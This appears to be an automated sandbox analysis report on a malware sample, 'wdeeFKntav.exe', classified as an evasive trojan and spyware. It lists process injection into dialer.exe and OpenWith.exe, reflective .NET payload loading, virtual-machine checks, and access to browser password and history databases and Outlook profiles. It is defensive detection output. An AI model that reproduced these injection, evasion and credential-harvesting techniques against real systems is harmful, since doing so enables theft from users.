Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F086FA0 3_2_00007DF41F086FA0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F10C01C 3_2_00007DF41F10C01C
Sample file is different than original file name gathered from version info
Source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000046E3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenameKernelbase.dllj% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2112870082.0000000004652000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000000.2073258965.0000000000CDB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameTCPZ.exe, vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2112932104.0000000004730000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2113264458.00000000049C1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenameKernelbase.dllj% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2112323721.0000000004936000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2111775317.0000000004738000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs wdeeFKntav.exe
Source: wdeeFKntav.exe, 00000000.00000003.2112684749.000000000488D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe
Source: wdeeFKntav.exe Binary or memory string: OriginalFilenameTCPZ.exe, vs wdeeFKntav.exe
Uses 32bit PE files
Source: wdeeFKntav.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@5/0@0/1
Source: C:\Windows\SysWOW64\dialer.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\wdeeFKntav.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 00000003.00000003.2320449048.0000025B16DB7000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16DB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE sqlite_sequence(name,seq) AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)framework;
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 00000003.00000003.2319637690.0000025B1705F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17020000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319529034.0000025B1705F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2330694334.0000025B17000000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2330260861.0000025B17050000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: wdeeFKntav.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\Desktop\wdeeFKntav.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\wdeeFKntav.exe "C:\Users\user\Desktop\wdeeFKntav.exe"
Source: C:\Users\user\Desktop\wdeeFKntav.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\user\Desktop\wdeeFKntav.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe" Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Users\user\Desktop\wdeeFKntav.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook Jump to behavior
Source: wdeeFKntav.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: wdeeFKntav.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831L source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbf source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, Runtime.cs .Net Code: CoreMain
PE file contains sections with non-standard names
Source: wdeeFKntav.exe Static PE information: section name: .textbss
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC5AF4 pushad ; retf 0_3_00CC5B03
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC6285 push F693B671h; retf 0_3_00CC628A
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC7C52 push dword ptr [edx+ebp+3Bh]; retf 0_3_00CC7C5F
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC5DCE push edi; iretd 0_3_00CC5DD5
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC2F4E push eax; retf 0_3_00CC2F4F
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC6F48 push es; ret 0_3_00CC6F49
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC416F push ecx; iretd 0_3_00CC417B
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC657C push esi; ret 0_3_00CC6580
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC412F pushad ; ret 0_3_00CC4137
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00C79429 push cs; retf 0_2_00C79565
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00C78964 push ebx; retf 0_2_00C78965
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00C7750E push ds; iretd 0_2_00C77517
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00C81269 push edx; retf 0_2_00C81422
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00C7FF22 push edi; iretd 0_2_00C7FF2D
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_02723E4E push edi; iretd 2_3_02723E55
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_02725CD2 push dword ptr [edx+ebp+3Bh]; retf 2_3_02725CDF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_02723B74 pushad ; retf 2_3_02723B83
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_02724305 push F693B671h; retf 2_3_0272430A
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_027245FC push esi; ret 2_3_02724600
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_027221EF push ecx; iretd 2_3_027221FB
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_02724FC8 push es; ret 2_3_02724FC9
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_02720FCE push eax; retf 2_3_02720FCF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_027221AF pushad ; ret 2_3_027221B7
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F044CA0 push edx; ret 3_2_00007DF41F044CAB
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F049D1E push esi; retf 000Ah 3_2_00007DF41F049D1F
Source: C:\Users\user\Desktop\wdeeFKntav.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains functionality to detect virtual machines (STR)
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F03ABBE str word ptr [ebp+ecx*4+05h] 3_2_00007DF41F03ABBE
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058E20 GetLogicalDriveStringsW, 3_2_00007DF41F058E20
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0B7344 GetSystemInfo, 3_2_00007DF41F0B7344
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft Jump to behavior
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
